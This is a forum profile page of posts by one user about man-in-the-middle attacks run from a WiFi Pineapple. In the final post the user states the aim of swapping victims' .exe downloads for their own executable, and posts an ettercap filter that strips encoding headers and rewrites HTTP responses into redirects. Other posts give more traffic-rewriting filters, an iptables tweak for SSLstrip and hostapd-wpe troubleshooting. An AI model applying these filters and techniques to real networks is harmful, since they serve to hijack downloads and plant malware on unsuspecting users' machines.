Jump to content

DarkPringles

Active Members
  • Posts

    18
  • Joined

  • Last visited

Posts posted by DarkPringles

  1. Hey DataHead, first, thanks for your time. I installed the IPK file. Can you tell me what you have done for the compiling process? Have you patched the hostapd application?

    In the installation guide on the Github project is hostapd in 2.2 version but in the ipk file it is 2.3-devel.

    Output after running hostapd-wpe

    hostapd-wpe hostapd-wpe.conf
    Configuration file: hostapd-wpe.conf
    Unsupported EAP type 'FAST' on line 78 in 'hostapd-wpe.eap_user'
    Line 42: unknown configuration item 'eap_fast_a_id'
    Line 43: unknown configuration item 'eap_fast_a_id_info'
    Line 44: unknown configuration item 'eap_fast_prov'
    Line 46: unknown configuration item 'pac_key_lifetime'
    Line 47: unknown configuration item 'pac_key_refresh_time'
    Line 48: unknown configuration item 'pac_opaque_encr_key'
    7 errors found in configuration file 'hostapd-wpe.conf'
    Failed to set up interface with hostapd-wpe.conf
    Failed to initialize interface

    Best regards,

    DarkPringles

  2. In my proxy, I make sure that the length is recalculated on injection.

    In regards to ettercap, I genuinely do not know, I haven't got too much experience, but I would expect it does. I'll take a look at the source this weekend.

    I am expecting to launch my proxy by the end of the month / start of next month.

    Best,

    Sebkinne

    any updates on this topic?

    btw: realtime file download replacement is now integrated in zANTI2 App for Andriod (replacement for dSploit)

    Link: https://www.zimperium.com/zanti-mobile-penetration-testing

  3. In my proxy, I make sure that the length is recalculated on injection.

    In regards to ettercap, I genuinely do not know, I haven't got too much experience, but I would expect it does. I'll take a look at the source this weekend.

    I am expecting to launch my proxy by the end of the month / start of next month.

    Best,

    Sebkinne

    very cool. i will be waiting and stop my work on ettercap custom filters.

  4. the message is: "Privileges dropped to UID 0 GID 0..." ... iptables are also enabled. i used the same configuration at my kali box with the same results...ettercap found the string but replacement is still without impact. i use non ssl sites to test it.

    so it has to be a trivial error, because it not work on kali or the pineapple.

    to sum up.

    UID change to 0

    iptables uncomment in etter.conf

    the custom filter is like in the post before

    command in kali: "ettercap -Tq -i wlan0 -F custom-filter"

    command in pineapple: "ettercap -Tq -i br-lan -F custom-filter"

    any ideas?

    thanks for your time!

  5. Your ettercap config may need iptables enabled... idk maybe u have already done this

    Also u need to see plain text, accept-encoding rrplace wi. Azzept-encoding

    Idk maybe u leedt that part out of your post

    thanks for help. i forget to replace the encoding part .... -.-

    my filter is now at this state but no result at the client side =(

    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Azzept-encoding");
    msg("Enc Skippd \n");
    }
    }
    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "software")) {
    replace("software", "hardware");
    msg("Software Replaced \n");
    }
    }
  6. @cheeto

    This is correct.

    Another problem: After shutting down SSLstrip all clients loose internet connection because the ip table rule for SSLstrip is not correctly deleted. I put the following content to the actions.php in the SSLstrip infusion:

    File: /pineapple/components/infusions/sslstrip/includes/actions.php

    after: "if (isset($_GET['stop']))"

    insert: "exec("iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000");"

    to ensure that the this route is deleted correctly. now the clients get internet access. maybe the Hak5 Team can add this in the next version ?

    Cheers,

    DarkPringles

  7. Kann ich leider nicht, ettercap ist etwas buggy.. Mal gucken ob wir vllt an einen neuere Version kommen.

    Best Regards,

    Sebkinne

    Just found it out. Ettercap disable IP-Forwarding in the kernel before starts sniffing. Just enabled it again ("echo 1 > /proc/sys/net/ipv4/ip_forward") after starting ettercap. After doing it clients get internet connection and you are able to manipulate the traffic with custom ettercap filters....

    But manipulating the traffic with ettercap and custom filters is still not possible for me. Ettercap told me that he found a string and replaced it but without impact in the clients webbrowser -.-

    source of filter:

    if (ip.proto == TCP) {
    if (search(DATA.data, "Software")) {
    replace("Software", "Hardware");
    msg("String Replaced \n");
    }
    }
  8. Hi Hak5 community,

    i have a few problems with implementing some feature to the Wifi Pineapple and hope anybody can help me. My goal is to run a script that replaces every requested *.exe file with a link of my own.

    Scenario: A user try to download for example VLC Media Player from the official site (http://get.videolan.org/vlc/2.1.5/win32/vlc-2.1.5-win32.exe) over the Wifi Pinapple. The Pinapple intercept this request and replace it with a custom *.exe Link so that the user download and execute my custom executable.

    In best case i want to implement a tiny text file that saves the ip adress of this user that got the replaced exe and if he tried to redownload his file, he will not get spoofed.

    But first the replacement. I want to implement a custom ettercap filter that i found on the internet. But everytime i want to use ettercap for a unfined sniffing the internet connection of all clients connected to the pineapple abort. The only way to get ettercap working is to set the "-u" parameter. This option prevents ettercap to disable ip forwarding in the kernel. But with this parameter the usage of filters that replace data in realtime is prohibited.

    So the final question is how to run ettercap with custom filters or is there any alternative solution for my problem. i hope anyone can help me =)

    Best regards,

    DarkPringles, from Germany

    Source of the filter (i will customize that later) :

    # replace rmccurdy with your website
    # replace the url with what ever exe you like
    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    # note: replacement string is same length as original string
    msg("zapped Accept-Encoding!n");
    }
    }
    if (ip.proto == TCP && tcp.src == 80) {
    replace("keep-alive", "close" ");
    replace("Keep-Alive", "close" ");
    }
    if (ip.proto == TCP && search(DATA.data, ": application") ){
    # enable for logging log(DECODED.data, "/tmp/log.log");
    msg("found EXEn");
    # "Win32" is the first part of the exe example:
    # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
    if (search(DATA.data, "Win32")) {
    msg("doing nothingn");
    }
    else {
    replace("200 OK", "301 Moved Permanently
    Location: <snip>
    ");
    msg("redirect successn");
    }
    }
×
×
  • Create New...